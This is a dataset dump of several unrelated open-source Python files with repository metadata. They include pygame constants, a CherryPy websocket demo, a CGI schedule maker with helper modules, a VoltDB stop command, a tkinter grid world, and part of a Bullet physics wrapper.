VIDEORESIZE = sdl.SDL_VIDEORESIZE
VIDEOEXPOSE = sdl.SDL_VIDEOEXPOSE
EVENT_RESERVED2 = sdl.SDL_EVENT_RESERVED2
EVENT_RESERVED3 = sdl.SDL_EVENT_RESERVED3
EVENT_RESERVED4 = sdl.SDL_EVENT_RESERVED4
EVENT_RESERVED5 = sdl.SDL_EVENT_RESERVED5
EVENT_RESERVED6 = sdl.SDL_EVENT_RESERVED6
EVENT_RESERVED7 = sdl.SDL_EVENT_RESERVED7
USEREVENT = sdl.SDL_USEREVENT
NUMEVENTS = sdl.SDL_NUMEVENTS
USEREVENT_DROPFILE = 0x1000
# Surface things
SWSURFACE = sdl.SDL_SWSURFACE
HWSURFACE = sdl.SDL_HWSURFACE
LIL_ENDIAN = sdl.SDL_LIL_ENDIAN
FULLSCREEN = sdl.SDL_FULLSCREEN
RESIZABLE = sdl.SDL_RESIZABLE
NOFRAME = sdl.SDL_NOFRAME
DOUBLEBUF = sdl.SDL_DOUBLEBUF
HWACCEL = sdl.SDL_HWACCEL
ASYNCBLIT = sdl.SDL_ASYNCBLIT
RLEACCEL = sdl.SDL_RLEACCEL
RLEACCELOK = sdl.SDL_RLEACCELOK
SRCALPHA = sdl.SDL_SRCALPHA
SRCCOLORKEY = sdl.SDL_SRCCOLORKEY
HWPALETTE = sdl.SDL_HWPALETTE
ANYFORMAT = sdl.SDL_ANYFORMAT
BLEND_RGB_ADD = 0x01
BLEND_RGB_SUB = 0x02
BLEND_RGB_MULT = 0x03
BLEND_RGB_MIN = 0x04
BLEND_RGB_MAX = 0x05
BLEND_RGBA_ADD = 0x06
BLEND_RGBA_SUB = 0x07
BLEND_RGBA_MULT = 0x08
BLEND_RGBA_MIN = 0x09
BLEND_RGBA_MAX = 0x10
BLEND_PREMULTIPLIED = 0x11
BLEND_ADD = BLEND_RGB_ADD
BLEND_SUB = BLEND_RGB_SUB
BLEND_MULT = BLEND_RGB_MULT
BLEND_MIN = BLEND_RGB_MIN
BLEND_MAX = BLEND_RGB_MAX
# OpenGL stuff
OPENGL = sdl.SDL_OPENGL
GL_RED_SIZE = sdl.SDL_GL_RED_SIZE
GL_GREEN_SIZE = sdl.SDL_GL_GREEN_SIZE
GL_BLUE_SIZE = sdl.SDL_GL_BLUE_SIZE
GL_ALPHA_SIZE = sdl.SDL_GL_ALPHA_SIZE
GL_BUFFER_SIZE = sdl.SDL_GL_BUFFER_SIZE
GL_DOUBLEBUFFER = sdl.SDL_GL_DOUBLEBUFFER
GL_DEPTH_SIZE = sdl.SDL_GL_DEPTH_SIZE
GL_STENCIL_SIZE = sdl.SDL_GL_STENCIL_SIZE
GL_ACCUM_RED_SIZE = sdl.SDL_GL_ACCUM_RED_SIZE
GL_ACCUM_GREEN_SIZE = sdl.SDL_GL_ACCUM_GREEN_SIZE
GL_ACCUM_BLUE_SIZE = sdl.SDL_GL_ACCUM_BLUE_SIZE
GL_ACCUM_ALPHA_SIZE = sdl.SDL_GL_ACCUM_ALPHA_SIZE
GL_STEREO = sdl.SDL_GL_STEREO
GL_MULTISAMPLEBUFFERS = sdl.SDL_GL_MULTISAMPLEBUFFERS
GL_MULTISAMPLESAMPLES = sdl.SDL_GL_MULTISAMPLESAMPLES
GL_ACCELERATED_VISUAL = sdl.SDL_GL_ACCELERATED_VISUAL
GL_SWAP_CONTROL = sdl.SDL_GL_SWAP_CONTROL
# Keys
from pygame._sdl_keys import *
| lgpl-2.1 | 2,889,663,793,123,178,000 | 29.2 | 68 | 0.772903 | false |
KanoComputing/nush | ws4py/droid_sensor_cherrypy_server.py | 1 | 2357 | # -*- coding: utf-8 -*-
import os.path
import cherrypy
from ws4py.server.cherrypyserver import WebSocketPlugin, WebSocketTool
from ws4py.websocket import WebSocket
class BroadcastWebSocketHandler(WebSocket):
def received_message(self, m):
cherrypy.engine.publish('websocket-broadcast', str(m))
class Root(object):
@cherrypy.expose
def index(self):
return """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>WebSocket example displaying Android device sensors</title>
<link rel="stylesheet" href="/css/style.css" type="text/css" />
<script type="application/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"> </script>
<script type="application/javascript" src="https://raw.github.com/caleb531/jcanvas/master/jcanvas.min.js"> </script>
<script type="application/javascript" src="/js/droidsensor.js"> </script>
<script type="application/javascript">
$(document).ready(function() {
initWebSocket();
drawAll();
});
</script>
</head>
<body>
<section id="content" class="body">
<canvas id="canvas" width="900" height="620"></canvas>
</section>
</body>
</html>
"""
@cherrypy.expose
def ws(self):
cherrypy.log("Handler created: %s" % repr(cherrypy.request.ws_handler))
if __name__ == '__main__':
cherrypy.config.update({
'server.socket_host': '192.168.0.12',
'server.socket_port': 11000,
'tools.staticdir.root': os.path.abspath(os.path.join(os.path.dirname(__file__), 'static'))
}
)
print os.path.abspath(os.path.join(__file__, 'static'))
WebSocketPlugin(cherrypy.engine).subscribe()
cherrypy.tools.websocket = WebSocketTool()
cherrypy.quickstart(Root(), '', config={
'/js': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'js'
},
'/css': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'css'
},
'/images': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'images'
},
'/ws': {
'tools.websocket.on': True,
'tools.websocket.handler_cls': BroadcastWebSocketHandler
}
}
)
| gpl-3.0 | -3,472,286,452,983,433,700 | 31.287671 | 125 | 0.585914 | false |
ActiveState/code | recipes/Python/475112_Schedule_Maker/recipe-475112.py | 1 | 14819 | ################################################################################
# index.py
################################################################################
import html_help
import os
import sys
import time
import Zcgi
KEYS = 'description', 'start', 'end', 'sunday', 'monday', \
'tuesday', 'wednesday', 'thursday', 'friday', 'saturday'
class soft_dict:
def __init__(self, dictionary, format):
self.__dictionary = dictionary
self.__format = format
def __getitem__(self, key):
try:
if self.__dictionary[key]:
return self.__format % self.__dictionary[key]
except:
pass
return ''
class WeekError:
def __init__(self, string):
self.__string = string
def __str__(self):
return self.__string
def main():
if Zcgi.dictionary is None:
show_form()
elif has_keys(Zcgi.dictionary, KEYS):
show_table()
else:
show_form()
def show_form(error=''):
if error:
error = '\t\t<b>' + error + '</b>\n'
values = soft_dict(Zcgi.dictionary, ' value="%s"')
Zcgi.print_html('''<html>
\t<head>
\t\t<title>
\t\t\tSchedule Maker
\t\t</title>
\t</head>
\t<body>
%s\t\t<form action="%s">
\t\t\tDescription:<br>
\t\t\t<input type="text"%s name="description" size="25"><br>
\t\t\tStart Date:<br>
\t\t\t<input type="text"%s name="start" size="25"><br>
\t\t\tEnd Date:<br>
\t\t\t<input type="text"%s name="end" size="25"><br>
\t\t\tSunday:<br>
\t\t\t<input type="text"%s name="sunday" size="25"><br>
\t\t\tMonday:<br>
\t\t\t<input type="text"%s name="monday" size="25"><br>
\t\t\tTuesday:<br>
\t\t\t<input type="text"%s name="tuesday" size="25"><br>
\t\t\tWednesday:<br>
\t\t\t<input type="text"%s name="wednesday" size="25"><br>
\t\t\tThursday:<br>
\t\t\t<input type="text"%s name="thursday" size="25"><br>
\t\t\tFriday:<br>
\t\t\t<input type="text"%s name="friday" size="25"><br>
\t\t\tSaturday:<br>
\t\t\t<input type="text"%s name="saturday" size="25"><br>
\t\t\t<input type="submit" value="Create Schedule">
\t\t</form>
\t</body>
</html>''' % tuple([error, os.path.basename(sys.argv[0])] \
+ unpack(values, KEYS)))
def has_keys(dictionary, keys):
for key in keys:
if not dictionary.has_key(key):
return False
return True
def show_table():
values = Zcgi.dictionary
if not values['description']:
show_form('You must enter a description.')
try:
start = time.strptime(values['start'], '%m/%d/%y')
end = time.strptime(values['end'], '%m/%d/%y')
except:
show_form('Dates must be in the MM/DD/YY format.')
try:
assert time.mktime(end) > time.mktime(start)
except:
show_form('The end date must come after the start date.')
try:
check_week(values, KEYS[3:])
except WeekError, problem:
show_form(str(problem))
html = create_html(values['description'], start, end, unpack(values, KEYS[3:]))
Zcgi.print_html(html)
def unpack(values, keys):
unpacked = []
for key in keys:
unpacked.append(values[key])
return unpacked
def check_week(dictionary, keys):
for key in keys:
try:
if not dictionary[key]:
continue
hm = dictionary[key].split('-')
assert len(hm) == 2
first = time.strptime(hm[0].strip(), '%H:%M')
second = time.strptime(hm[1].strip(), '%H:%M')
dictionary[key] = hm[0].strip() + ' - ' + hm[1].strip()
except:
raise WeekError(key.capitalize() + ' should be in the HH:MM - HH:MM format.')
try:
assert second.tm_hour * 60 + second.tm_min > first.tm_hour * 60 + first.tm_min
except:
raise WeekError('Start time must come before end time on ' + key.capitalize() + '.')
def create_html(description, start, end, week):
html = '''<html>
\t<head>
\t\t<title>
\t\t\tThe Schedule
\t\t</title>
\t</head>
\t<body>
\t\t<center>
'''
start_month = start.tm_year * 12 + (start.tm_mon - 1)
end_month = end.tm_year * 12 + (end.tm_mon - 1)
for month in range(start_month, end_month + 1):
html += html_help.html_table(1, 1, 3, '\t').mutate(0, 0, create_month_html(description, start, end, week, month)).html() + '\n'
if month != end_month:
html += '\t\t\t<hr>\n'
return html + '\t\t</center>\n\t</body>\n</html>'
def create_month_html(description, start, end, week, month):
start = time.mktime(start) - 43200
end = time.mktime(end) + 43200
now = time.strptime(str((month / 12) % 100).zfill(2) + ' ' + str(month % 12 + 1) + ' 01', '%y %m %d')
html = '<b>' + time.strftime('%B %Y', now) + '</b>\n'
html_month = html_help.html_month((month / 12) % 100, month % 12 + 1, 0, '\t')
html_month.table_option('border="1" width="800"').row_option('valign="top"').column_option('width="14%"')
now_month = now.tm_mon
while now.tm_mon == now_month:
mktime = time.mktime(now)
if start <= mktime <= end:
week_day = (now.tm_wday + 1) % 7
if week[week_day]:
html_month.mutate(now.tm_mday, '<b>' + description + '</b><br>\n' + week[week_day])
now = time.localtime(mktime + 86400)
return html + html_month.html()
if __name__ == '__main__':
Zcgi.execute(main, 'cgi')
################################################################################
# html_help.py
################################################################################
import time
import Zam
class html_table:
def __init__(self, rows, columns, indent, style):
self.__matrix = Zam.matrix(rows, columns, '')
self.__indent = indent
self.__style = style
self.__table_option = ''
self.__row_option = ''
self.__column_option = ''
def mutate(self, row, column, text):
assert type(text) is str
self.__matrix[row][column] = text
return self
def access(self, row, column):
return self.__matrix[row][column]
def table_option(self, string):
assert type(string) is str
self.__table_option = string
return self
def row_option(self, string):
assert type(string) is str
self.__row_option = string
return self
def column_option(self, string):
assert type(string) is str
self.__column_option = string
return self
def html(self):
html = self.__style * self.__indent + '<table'
if self.__table_option:
html += ' ' + self.__table_option
html += '>\n'
for row in self.__matrix:
html += self.__style * (self.__indent + 1) + '<tr'
if self.__row_option:
html += ' ' + self.__row_option
html += '>\n'
for item in row:
html += self.__style * (self.__indent + 2) + '<td'
if self.__column_option:
html += ' ' + self.__column_option
html += '>\n'
html += ''.join([self.__style * (self.__indent + 3) + line + '\n' for line in item.splitlines()])
html += self.__style * (self.__indent + 2) + '</td>\n'
html += self.__style * (self.__indent + 1) + '</tr>\n'
return html + self.__style * self.__indent + '</table>'
class html_month:
def __init__(self, year, month, indent, style):
matrix = self.__make_matrix(year, month)
self.__table = html_table(len(matrix) + 1, 7, indent, style)
for index, item in enumerate(('Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday')):
self.__table.mutate(0, index, '<b>' + item + '</b>')
for row in range(len(matrix)):
for column in range(7):
if matrix[row][column]:
self.__table.mutate(row + 1, column, '<b>' + str(matrix[row][column]).zfill(2) + '</b>\n<hr>\n')
def __make_matrix(self, year, month):
rows = [Zam.array(7, 0)]
row = 0
now = time.localtime(time.mktime(time.strptime(str(year).zfill(2) + ' ' + str(month).zfill(2) + ' 01', '%y %m %d')) + 14400)
self.__first_day = (now.tm_wday + 1) % 7
once = False
while now.tm_mon == month:
if once:
if now.tm_wday == 6:
rows.append(Zam.array(7, 0))
row += 1
else:
once = True
rows[row][(now.tm_wday + 1) % 7] = now.tm_mday
self.__days_in_month = now.tm_mday
now = time.localtime(time.mktime(now) + 86400)
return rows
def mutate(self, day, text):
row, column = self.__get_pos(day)
self.__table.mutate(row, column, self.__table.access(row, column)[:15] + text)
return self
def access(self, day):
row, column = self.__get_pos(day)
return self.__table.access(row, column)[15:]
def __get_pos(self, day):
assert 1 <= day <= self.__days_in_month
pos = self.__first_day - 1 + day
return pos / 7 + 1, pos % 7
def table_option(self, string):
self.__table.table_option(string)
return self
def row_option(self, string):
self.__table.row_option(string)
return self
def column_option(self, string):
self.__table.column_option(string)
return self
def html(self):
return self.__table.html()
################################################################################
# Zam.py
################################################################################
# Name & Description
# ==================
'''Support module for array and matrix use.
This module provides two classes that emulate one and two
dimentional lists with fixed sizes but mutable internals.'''
# Data & Imports
# ==============
__all__ = ['array', 'matrix']
__version__ = '1.1'
import sys
# Public Names
# ============
class array(object):
'''array(length) -> new array
array(length, value) -> initialized from value'''
def __init__(self, length, value=None):
'''x.__init__(...) initializes x'''
self.__data = range(length)
for index in range(length):
self.__data[index] = value
def __repr__(self):
'''x.__repr__() <==> repr(x)'''
return repr(self.__data)
def __len__(self):
'''x.__len__() <==> len(x)'''
return len(self.__data)
def __getitem__(self, key):
'''x.__getitem__(y) <==> x[y]'''
return self.__data[key]
def __setitem__(self, key, value):
'''x.__setitem__(i, y) <==> x[i]=y'''
self.__data[key] = value
def __delitem__(self, key):
'''x.__delitem__(y) <==> del x[y]'''
self.__data[key] = None
def __iter__(self):
'''x.__iter__() <==> iter(x)'''
return iter(self.__data)
def __contains__(self, value):
'''x.__contains__(y) <==> y in x'''
return value in self.__data
class matrix(object):
'''matrix(rows, columns) -> new matrix
matrix(rows, columns, value) -> initialized from value'''
def __init__(self, rows, columns, value=None):
'''x.__init__(...) initializes x'''
self.__data = array(rows)
for index in range(rows):
self.__data[index] = array(columns, value)
def __repr__(self):
'''x.__repr__() <==> repr(x)'''
return repr(self.__data)
def __len__(self):
'''x.__len__() <==> len(x)'''
return len(self.__data)
def __getitem__(self, key):
'''x.__getitem__(y) <==> x[y]'''
return self.__data[key]
def __setitem__(self, key, value):
'''x.__setitem__(i, y) <==> x[i]=y'''
self.__data[key] = array(len(self.__data[key]), value)
def __delitem__(self, key):
'''x.__delitem__(y) <==> del x[y]'''
self.__data[key] = array(len(self.__data[key]))
def __iter__(self):
'''x.__iter__() <==> iter(x)'''
return iter(self.__data)
def __contains__(self, value):
'''x.__contains__(y) <==> y in x'''
for item in self.__data:
if value in item:
return True
return False
# Private Names
# =============
def main():
print 'Content-Type: text/plain'
print
print file(sys.argv[0]).read()
# Execute Main
# ============
if __name__ == '__main__':
main()
################################################################################
# Zcgi.py
################################################################################
# Name & Description
# ==================
'''Support module for use by CGI scripts.
This module provides several functions and variables
that help with printing text and accessing form data.'''
# Data & Imports
# ==============
__all__ = ['execute', 'print_html', 'print_plain', 'print_self',
'dictionary', 'string']
__version__ = '1.2'
import os
import sys
import types
# Public Names
# ============
def execute(main, exception):
'''execute(function main, str exception)
Execute main unless exception.'''
assert_type((types.FunctionType, main), (str, exception))
if exception == string:
print_self()
else:
main()
def print_html(text):
'''print_html(str text)
Print text as HTML.'''
assert_type((str, text))
print 'Content-Type: text/html'
print
print text
sys.exit(0)
def print_plain(text):
'''print_plain(str text)
Print text as plain.'''
assert_type((str, text))
print 'Content-Type: text/plain'
print
print text
sys.exit(0)
def print_self():
'''print_self()
Print __main__ as plain.'''
print 'Content-Type: text/plain'
print
print file(sys.argv[0]).read()
sys.exit(0)
# Private Names
# =============
def export():
global dictionary, string
dictionary = string = None
try:
string = os.environ['QUERY_STRING']
temp = string.replace('+', ' ').split('&')
for index in range(len(temp)):
temp[index] = temp[index].split('=')
dictionary = dict()
for parameter, value in temp:
dictionary[decode(parameter)] = decode(value)
except:
pass
def decode(string):
assert_type((str, string))
index = string.find('%')
while index != -1:
string = string[:index] + chr(int(string[index+1:index+3], 16)) + string[index+3:]
index = string.find('%', index + 1)
return string
def assert_type(*tuples):
for types, objects in tuples:
if type(objects) is not types:
raise TypeError
# Execute Conditional
# ===================
if __name__ == '__main__':
print_self()
else:
export()
| mit | -5,567,249,290,560,385,000 | 28.228797 | 135 | 0.512113 | false |
eoneil1942/voltdb-4.7fix | lib/python/voltcli/voltdb.d/stop.py | 1 | 1682 | # This file is part of VoltDB.
# Copyright (C) 2008-2014 VoltDB Inc.
#
# This file contains original code and/or modifications of original code.
# Any modifications made by VoltDB Inc. are licensed under the following
# terms and conditions:
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import signal
from voltcli import utility
@VOLT.Command(
description = 'Stop a VoltDB server daemon.',
options = [
VOLT.StringOption('-H', '--host', 'host',
'HOST[:PORT] (default HOST=localhost, PORT=3021)',
default='localhost:3021'),
]
)
def stop(runner):
daemonizer = runner.create_daemonizer(description="VoltDB server")
daemonizer.stop_daemon() | agpl-3.0 | -6,828,493,845,769,102,000 | 40.04878 | 73 | 0.743757 | false |
efanescent/SapidCircuits | World.py | 1 | 2775 | import Control
from tkinter.messagebox import showerror
from Window import *
from Utils import *
canvas, field, scale = None, None, None
def init(window, p_field=-1, p_scale=10):
"""using to init World with params"""
global canvas, field, scale
canvas = tk.Canvas(window, highlightthickness=0, bg='#FFF3A4')
canvas.pack(side='top', fill='both', expand=True)
field = p_field
scale = p_scale
# auto setting control
try: set_control()
except:
showerror('Error', 'Control can\'t be set')
def set_field(p_field):
"""set up field in the world"""
global field
field = p_field
def clear():
"""remove all elements from canvas"""
global canvas
canvas.delete('all')
def scale_(*args, **kwargs):
"""universal function for set/get/change scale
if arg is num - change scale
if kwarg wiz index 'set' - set scale
and then return current scale"""
global scale
for arg in args:
if isinstance(scale, (int, float)):
scale += arg
for key in kwargs:
if key == 'set':
scale = kwargs[key]
return scale
def draw():
global canvas, field, scale
if field == -1: return False
# possibly this is bad idea... idk
clear()
# redraw empty tiles
cx, cy = field.x, field.y
for col in range(int(field.height)):
for row in range(int(field.width)):
canvas.create_rectangle(cx, cy, cx+1000/scale, cy+1000/scale)
cx += (1000/scale)
cx = field.x
cy += (1000/scale)
def set_control():
"""set control..."""
canvas.master.bind_all('<Key>', Control.pressed)
def move_view(**kwargs):
for key in kwargs:
if key == 'x':
canvas.xview_scroll(int(kwargs[key]), 'units')
if key == 'y':
canvas.yview_scroll(int(kwargs[key]), 'units')
class Field:
"""class contains tiles"""
def __init__(self, sx, sy, width, height):
self.x = sx # start x
self.y = sy # start y
# width 'n' height in units (f.e. 2x3 = 6units or tiles)
self.width = width
self.height = height
self.tiles = dict() # no tiles, excepting empty
def add_tile(self, tx, ty, tile):
"""add tile in tiles container"""
self.tiles[tile_xy2i(tx, ty)] = tile
def get_tile(self, tx, ty):
"""return tile from tiles container"""
try:
return self.tiles[tile_xy2i(tx, ty)]
except:
return -1
def is_empty_tile(self, tx, ty):
"""return bool - tile is empty"""
try:
self.tiles[tile_xy2i(tx, ty)]
except:
return True
else:
return False
class Tile:
def __init__(self, Id):
self.ID = Id | mit | 5,046,132,535,887,485,000 | 24.943925 | 73 | 0.57045 | false |
daviddeng/azrael | azrael/bullet_api.py | 1 | 21037 | # Copyright 2014, Oliver Nagy <[email protected]>
#
# This file is part of Azrael (https://github.com/olitheolix/azrael)
#
# Azrael is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Azrael is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Azrael. If not, see <http://www.gnu.org/licenses/>.
"""
Provide classes to create-, modify- and query dynamic simulations. The classes
abstract away the particular physics engine (currently Bullet) used underneath.
This module is the *one and only* module that actually imports the Bullet
engine (ie the wrapper called `azBullet`). This will make it easier to swap out
Bullet for another engine at some point, should the need arise.
"""
import logging
import numpy as np
import azrael.types as types
import azrael.bullet.azBullet as azBullet
from IPython import embed as ipshell
from azrael.types import typecheck, RetVal, _RigidBodyData
from azrael.types import ConstraintMeta, ConstraintP2P, Constraint6DofSpring2
from azrael.types import CollShapeMeta, CollShapeSphere, CollShapeBox, CollShapePlane
# Convenience.
Vec3 = azBullet.Vec3
Quaternion = azBullet.Quaternion
Transform = azBullet.Transform
# Convenience.
RigidBodyData = types.RigidBodyData
class PyRigidBody(azBullet.RigidBody):
"""
Wrapper around RigidBody class.
The original azBullet.RigidBody class cannot be extended since it is a
compiled module. However, by subclassing it we get the convenience of
a pure Python class (eg adding attributes at runtime). This is transparent
to the end user.
"""
def __init__(self, ci):
super().__init__(ci)
class PyBulletDynamicsWorld():
"""
High level wrapper around the low level Bullet bindings.
"""
def __init__(self, engineID: int):
# Create a Class-specific logger.
name = '.'.join([__name__, self.__class__.__name__])
self.logit = logging.getLogger(name)
# To distinguish engines.
self.engineID = engineID
# Create a standard Bullet Dynamics World.
self.dynamicsWorld = azBullet.BulletBase()
# Disable gravity.
self.dynamicsWorld.setGravity(Vec3(0, 0, 0))
# Dictionary of all bodies.
self.rigidBodies = {}
def setGravity(self, gravity: (tuple, list)):
"""
Set the ``gravity`` in the simulation.
"""
try:
gravity = np.array(gravity, np.float64)
assert gravity.ndim == 1
assert len(gravity) == 3
except (TypeError, ValueError, AssertionError):
return RetVal(False, 'Invalid type', None)
self.dynamicsWorld.setGravity(Vec3(*gravity))
return RetVal(True, None, None)
def removeRigidBody(self, bodyIDs: (list, tuple)):
"""
Remove ``bodyIDs`` from Bullet and return the number of removed bodies.
Non-existing bodies are not counted (and ignored).
:param list bodyIDs: list of bodyIDs to remove.
:return: number of actually removed bodies.
:rtype: int
"""
cnt = 0
# Remove every body, skipping non-existing ones.
for bodyID in bodyIDs:
# Skip non-existing bodies.
if bodyID not in self.rigidBodies:
continue
# Delete the body from all caches.
del self.rigidBodies[bodyID]
cnt += 1
# Return the total number of removed bodies.
return RetVal(True, None, cnt)
def compute(self, bodyIDs: (tuple, list), dt: float, max_substeps: int):
"""
Step the simulation for all ``bodyIDs`` by ``dt``.
This method aborts immediately if one or more bodyIDs do not exist.
The ``max_substeps`` parameter tells Bullet the maximum allowed
granularity. Typiclal values for ``dt`` and ``max_substeps`` are
(1, 60).
:param list bodyIDs: list of bodyIDs for which to update the physics.
:param float dt: time step in seconds
:param int max_substeps: maximum number of sub-steps.
:return: Success
"""
# All specified bodies must exist. Abort otherwise.
try:
rigidBodies = [self.rigidBodies[_] for _ in bodyIDs]
except KeyError as err:
self.logit.warning('Body IDs {} do not exist'.format(err.args))
return RetVal(False, None, None)
# Add the body to the world and make sure it is activated, as
# Bullet may otherwise decide to simply set its velocity to zero
# and ignore the body.
for body in rigidBodies:
self.dynamicsWorld.addRigidBody(body)
body.forceActivationState(4)
# The max_substeps parameter instructs Bullet to subdivide the
# specified timestep (dt) into at most max_substeps. For example, if
# dt= 0.1 and max_substeps=10, then, internally, Bullet will simulate
# no finer than dt / max_substeps = 0.01s.
self.dynamicsWorld.stepSimulation(dt, max_substeps)
# Remove all bodies from the simulation again.
for body in rigidBodies:
self.dynamicsWorld.removeRigidBody(body)
return RetVal(True, None, None)
def applyForceAndTorque(self, bodyID, force, torque):
"""
Apply a ``force`` and ``torque`` to the center of mass of ``bodyID``.
:param int bodyID: the ID of the body to update
:param 3-array force: force applied directly to center of mass
:param 3-array torque: torque around center of mass.
:return: Success
"""
# Sanity check.
if bodyID not in self.rigidBodies:
msg = 'Cannot set force of unknown body <{}>'.format(bodyID)
self.logit.warning(msg)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert the force and torque to Vec3.
b_force = Vec3(*force)
b_torque = Vec3(*torque)
# Clear pending forces (should be cleared automatically by Bullet when
# it steps the simulation) and apply the new ones.
body.clearForces()
body.applyCentralForce(b_force)
body.applyTorque(b_torque)
return RetVal(True, None, None)
def applyForce(self, bodyID: int, force, rel_pos):
"""
Apply a ``force`` at ``rel_pos`` to ``bodyID``.
:param int bodyID: the ID of the body to update
:param 3-array force: force applied directly to center of mass
:param 3-array rel_pos: position of force relative to center of mass
:return: Success
"""
# Sanity check.
if bodyID not in self.rigidBodies:
msg = 'Cannot set force of unknown body <{}>'.format(bodyID)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert the force and torque to Vec3.
b_force = Vec3(*force)
b_relpos = Vec3(*rel_pos)
# Clear pending forces (should be cleared automatically by Bullet when
# it steps the simulation) and apply the new ones.
body.clearForces()
body.applyForce(b_force, b_relpos)
return RetVal(True, None, None)
def getRigidBodyData(self, bodyID: int):
"""
Return Body State of ``bodyID``.
This method aborts immediately if ``bodyID`` does not exists.
:param int bodyID: the ID of body for which to return the state.
:return: ``_RigidBodyData`` instances.
"""
# Abort immediately if the ID is unknown.
if bodyID not in self.rigidBodies:
msg = 'Cannot find body with ID <{}>'.format(bodyID)
return RetVal(False, msg, None)
# Convenience.
body = self.rigidBodies[bodyID]
# Determine rotation and position.
rot = body.getCenterOfMassTransform().getRotation().topy()
pos = body.getCenterOfMassTransform().getOrigin().topy()
# Determine linear and angular velocity.
vLin = body.getLinearVelocity().topy()
vRot = body.getAngularVelocity().topy()
# Linear/angular damping factors.
axesLockLin = body.getLinearFactor().topy()
axesLockRot = body.getAngularFactor().topy()
# Bullet does not support scaling collision shape (actually, it does,
# but it is frought with problems). Therefore, we may thus copy the
# 'scale' value from the body's meta data.
scale = body.azrael[1].scale
# Bullet will never modify the Collision shape. We may thus use the
# information from the body's meta data.
cshapes = body.azrael[1].cshapes
# Construct a new _RigidBodyData structure and add it to the list
# that will eventually be returned to the caller.
out = _RigidBodyData(scale, body.getInvMass(),
body.getRestitution(), rot, pos, vLin, vRot,
cshapes, axesLockLin, axesLockRot, 0)
return RetVal(True, None, out)
@typecheck
def setRigidBodyData(self, bodyID: int, rbState: _RigidBodyData):
"""
Update State Variables of ``bodyID`` to ``rbState``.
Create a new body with ``bodyID`` if it does not yet exist.
:param int bodyID: the IDs of all bodies to retrieve.
:param ``_RigidBodyData`` rbState: body description.
:return: Success
"""
# Create the Rigid Body if it does not exist yet.
if bodyID not in self.rigidBodies:
self.createRigidBody(bodyID, rbState)
# Convenience.
body = self.rigidBodies[bodyID]
# Convert rotation and position to Vec3.
rot = Quaternion(*rbState.rotation)
pos = Vec3(*rbState.position)
# Assign body properties.
tmp = azBullet.Transform(rot, pos)
body.setCenterOfMassTransform(tmp)
body.setLinearVelocity(Vec3(*rbState.velocityLin))
body.setAngularVelocity(Vec3(*rbState.velocityRot))
body.setRestitution(rbState.restitution)
body.setLinearFactor(Vec3(*rbState.axesLockLin))
body.setAngularFactor(Vec3(*rbState.axesLockRot))
# Build and assign the new collision shape, if necessary.
old = body.azrael[1]
if (old.scale != rbState.scale) or \
not (np.array_equal(old.cshapes, rbState.cshapes)):
# Create a new collision shape.
tmp = self.compileCollisionShape(bodyID, rbState)
mass, inertia, cshapes = tmp.data
del mass, inertia, tmp
# Replace the existing collision shape with the new one.
body.setCollisionShape(cshapes)
del old
# Update the mass but leave the inertia intact. This is somewhat
# awkward to implement because Bullet returns the inverse values yet
# expects the non-inverted ones in 'set_mass_props'.
if rbState.imass == 0:
# Static body: mass and inertia are zero anyway.
body.setMassProps(0, Vec3(0, 0, 0))
else:
m = rbState.imass
x, y, z = body.getInvInertiaDiagLocal().topy()
if (m < 1E-10) or (x < 1E-10) or (y < 1E-10) or (z < 1E-10):
# Use safe values if either the inertia or the mass is too
# small for inversion.
m = x = y = z = 1
else:
# Inverse mass and inertia.
x = 1 / x
y = 1 / y
z = 1 / z
m = 1 / m
# Apply the new mass and inertia.
body.setMassProps(m, Vec3(x, y, z))
# Overwrite the old RigidBodyData instance with the latest version.
body.azrael = (bodyID, rbState)
return RetVal(True, None, None)
def setConstraints(self, constraints: (tuple, list)):
"""
Apply the ``constraints`` to the specified bodies in the world.
If one or more of the rigid bodies specified in any of the constraints
do not exist then this method will abort. Similarly, it will also abort
if one or more constraints could not be constructed for whatever
reason (eg. unknown constraint name).
In any case, this function will either apply all constraints or none.
It is not possible that this function applies only some constraints.
:param list constraints: list of `ConstraintMeta` instances.
:return: Success
"""
def _buildConstraint(c):
"""
Compile the constraint `c` into the proper C-level Bullet body.
"""
# Get handles to the two bodies. This will raise a KeyError unless
# both bodies exist.
rb_a = self.rigidBodies[c.rb_a]
rb_b = self.rigidBodies[c.rb_b]
# Construct the specified constraint type. Raise an error if the
# constraint could not be constructed (eg the constraint name is
# unknown).
if c.contype.upper() == 'P2P':
tmp = ConstraintP2P(*c.condata)
out = azBullet.Point2PointConstraint(
rb_a, rb_b,
Vec3(*tmp.pivot_a),
Vec3(*tmp.pivot_b)
)
elif c.contype.upper() == '6DOFSPRING2':
t = Constraint6DofSpring2(*c.condata)
